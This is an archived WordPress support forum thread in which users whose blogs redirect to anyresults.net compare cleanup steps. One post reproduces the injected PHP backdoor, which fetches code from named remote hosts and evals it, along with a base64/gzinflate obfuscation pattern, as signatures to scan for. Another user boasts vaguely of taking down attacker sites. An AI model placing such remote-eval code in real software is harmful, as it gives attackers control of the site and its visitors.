WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Hacked and Redirected ... Again (59 posts)

  1. whooami
    Member
    Posted 6 years ago #

    I thought I felt a shift in the force this morning!

    buahahha, it's early yet :P

  2. Bob Smith
    Member
    Posted 6 years ago #

    joni a site i have on my dedi that always had the latest version appears to have been hacked also. i also contacted his host and most of the affiliate programs i could find.

  3. Bob Smith
    Member
    Posted 6 years ago #

    ok - i got hacked by the redirect on my dedi on a blog which had the newest version of wp.

    using this:

    http://it.youtube.com/watch?v=Obqa6jDV-WQ

    (nice tutorial btw)

    i found the "old" file and deleted it - as well as the "rss ..." in wp_options.

    problem still there ... :(

    all other solutions i've come across don't help either.

    i can't even get angry anymore. i give up.

  4. macsoft3
    Member
    Posted 6 years ago #

    >the domain registrar just told me they would do nothing without a court order

    Why are you contacting the domain registrar? Is there anything wrong with anyresults.net's WhoIs info?

  5. Bob Smith
    Member
    Posted 6 years ago #

    i contacted isp, registrar, affiliate programs. sure it was a shotgun approach, but i was upset understandably.

  6. polimaker
    Member
    Posted 6 years ago #

    In all fairness to WP, if my blog got hacked the first person who would be feeling my wrath would be my hosting provider for having crappy security on my server. Quite frankly, unless you're downloading stuff willy-nilly to your server (you're not doing that, right?) your hosting provider should be providing enough security to protect you from random hacks.

    As far as fixing your current problem, if all else fails I'd suggest going nuclear. Use the "export" function to create an XML file of your posts and pages, and delete everything on your server. Start over with fresh copies of WP and your plugins. And while you're at it, look for a new hosting provider.

  7. Joni
    Member
    Posted 6 years ago #

    Idiots abound and they all have web hosting accounts nowadays. Everyone wants a freaking google adsense account so they can retire from the riches their shiny new WP blog will bring them. WP is the new AOL. Do these new bloggers bother to learn anything about security? Half of them can't even find the damn WP dashboard. It's enough to make you cry.

    So, simply put, you're only as secure as the dumbest idiot who shares server space with you and lord knows what he's doing. That's enough to keep me awake at night.

  8. Bob Smith
    Member
    Posted 6 years ago #

    polimaker, i bet i can find a blog that's been hacked with every provider.

    i can't imagine the amount of blogs that haven been affected. i the normal course of my goolging i have come across many affected by the same hack.

    this is the first hack i have ever suffered in the all years i've been running sites. i guess there is a first time for everything unfortunately ...

  9. Bob Smith
    Member
    Posted 6 years ago #

    jonimueller, your only solution is to blame us for not having the newest version installed as well as using shared hosting.

    well i got the hack on a blog on my dedi with the latest version installed.

    i recommend you stfu unless you have anything new or constructive to say.

  10. Joni
    Member
    Posted 6 years ago #

    Nope, that's not my only solution. You clearly don't read. Or if you read, you don't comprehend. And that falls under CNMP. So you can ignore me all day and all night if you want to. Can't shut me up tho. Nice try. And stop taking your frustration out on people on this forum. It really doesn't help anything and makes you look like a jackass.

    And in all of your rantings and ravings about your "dedi" did you REPORT the breach to security@wordpress.org as you were told to do more than once? Hmm?
    http://wordpress.org/support/topic/180772?replies=40%23post-777019#post-776783

  11. Bob Smith
    Member
    Posted 6 years ago #

    yes it was reported to them already. i have nothing more to say to you. please quit replying to my posts and i'll do the same. oter having been putting forth solutions and i appreciate it.

  12. whooami
    Member
    Posted 6 years ago #

    polimaker, i bet i can find a blog that's been hacked with every provider.

    and I'll bet you cant. But thats neither here nor there.

    --

    if you want to do something proactive rather than sit here and whine all day (im sorry but thats pretty much all youve done in this thread) -- why dont you go through your server logs for any suspicious $GET_s -- then when youre done with that, why dont you start logging $POST_s. There are only two ways someone can access your site,using a GET or using a POST, and both methods are very transparent.

  13. Babak
    Member
    Posted 6 years ago #

    Just spoke with technical support at the host for anyresult.net - http://www.isprime.com

    I gave them the URL for this thread and asked them to take appropriate measures. The person I spoke with requested a "ticket" but since I'm not a client there is no point in submitting one.

    In any case, the ball is in their court now if they want to actually do something about this.

    For others who may want to call them: 1-800-502-4678 x3 for tech support

  14. Babak
    Member
    Posted 6 years ago #

  15. macsoft3
    Member
    Posted 6 years ago #

    We have destroyed several dozen websites in the past year. So let me give you a few tips. I mentioned the name of isprime.com earlier. It's a web hosting company, not a domain registrar or suspect's network company (ISP). Babak may have made a right approach by contacting isprime.com only if his website has also been victimized and if visitors to his website are redirected to the website of anyresults.net. In other words, only the webmasters of the victimized websites should contact isprime.com and give the exact URLs where visitors are redirected to the website of anyresults.net.

    Contacting the owner of the affiliate program usually does nothing. That's because many of them only want money and want to hire as many idiots as possible.

  16. Bob Smith
    Member
    Posted 6 years ago #

    whooami, all i have done all week is tried the various solutions i have come across in my surfing on the net.

    yes i do come here periodically and "whine" but that has in between a very steep learning curve about databases and such. i admit i am not a database guru, but i am extremely proficient at other things doing the best i can while i learn ....

    yeah thanks Babak, i contacted i think abuse@isprime.com and they are looking into it - but you i know these hacking dirtbags will just move to a new isp when shut down ... at least we tried right?

  17. whooami
    Member
    Posted 6 years ago #

    thats fine, Bob.

    You indicated this happened on a fresh install -- if thats the case, what do you expect to gain by doing stuff (changing files around as you indicated in another thread, for instance) you find on the web? <-- that's a rhetorical q.

    In other words, what you probably ought to be doing is looking for the point of entry.

    Im not knocking your efforts, dont misunderstand, I just think you're missing, we are all missing a great opportunity.

    Again, I am willing to help -- just drop me a note.

  18. EverMaster
    Member
    Posted 6 years ago #

    Those are VERY dangerous:

    Make sure you scan ALL your files for following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }

    `
    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found clean it up!

    hey and dont forget to send nice abuse emails to ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us

  19. Babak
    Member
    Posted 6 years ago #

    WTF is anyresults.net still up? and the same host? how can any host be so negligible?

  20. deanc
    Member
    Posted 6 years ago #

    I can't even log in... and when I request a new password it won't even work.

    Has anyone experienced this? I'm reading here that people are trying all types of things to fix it... i'm jealous... I can't even log in to start the healing process!

    Looking forward to someone's reply asap!

    Thanks

  21. Bob Smith
    Member
    Posted 6 years ago #

    ok - just went through the steps found in this article:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    problem is still there on one of my blogs. is there any new tips out there that i can try? thanks in advance.

  22. RosieMBanks
    Member
    Posted 6 years ago #

    i gave up. no one in the wordpress community cares about helping someone hacked by their buggy shit cms. i used to love them, but now i know why so many experienced webmasters think wp is shit.

    Here's your hat. What's your hurry?

  23. macsoft3
    Member
    Posted 6 years ago #

    >WTF is anyresults.net still up? and the same host? how can any host be so negligible?

    It's now hosted in China.

  24. macsoft3
    Member
    Posted 6 years ago #

    All right. I decided to give you extended help in destroying the website at the domain of anyresults.net. I won't mention what I did. I can tell you that the criminal organization behind that website made a crucial mistake. Hopefully, this website will disappear from the face of Earth within 2 weeks or so. What a dumb group of criminals...

  25. VRocKs
    Member
    Posted 6 years ago #

    I did something bad once... It had to do with comments and moving my site to #1 in Google.

    My site was removed from my server within 2 days and GoDaddy.com canceled my account with them and made getting my domains back from them almost impossible. Took months to get them back.

    I guess things are a lot different now.

  26. Beer
    Member
    Posted 6 years ago #

    10 Results for 64.111.199.183

    1stguide.org
    Sponsoring Registrar:EstDomains, Inc.
    "EstDomains" - Always a good bet that this domain will be used for spam/hacking.

    anyresults.net
    Creation Date: 03-Jun-2008
    Must be a new hack? The domain wasn't registered until a week ago.

    buyd.org
    cureaworld.biz
    estbs.info
    gyla-4.info
    optha.info
    pilul.org
    roens.info
    thewaycool.biz

    AnyResults.net uses a FindWhat.com feed.
    FindWhat.com is: Miva Corporation
    +1.2395617229
    5220 Summerlin Commons Blvd.
    Suite 500
    Fort Myers, FL 33907

    Call or write them and they may terminate without payment. There's no way they would have paid them in 1 week already probably.

    Email sam.miller@miva.com or call toll free (888) 648-2237
    http://www.miva.com/us/content/partners/miva_mc/

  27. Bob Smith
    Member
    Posted 6 years ago #

  28. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    BTW, it is totally safe to delete ALL of the rss_bigStringOfRandomGibberish lines. These are the caches for the RSS feeds/widgets, and if they are not found, then they will simply be reloaded on the next run through. It will recreate them if they're missing, is my point. So kill them all.

    Only get the ones with the gibberish though. There are rss_options and similar things as well which you should not delete.

  29. macsoft3
    Member
    Posted 6 years ago #

    As I promised before, the website at the domain of anyresults.net is now dead.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.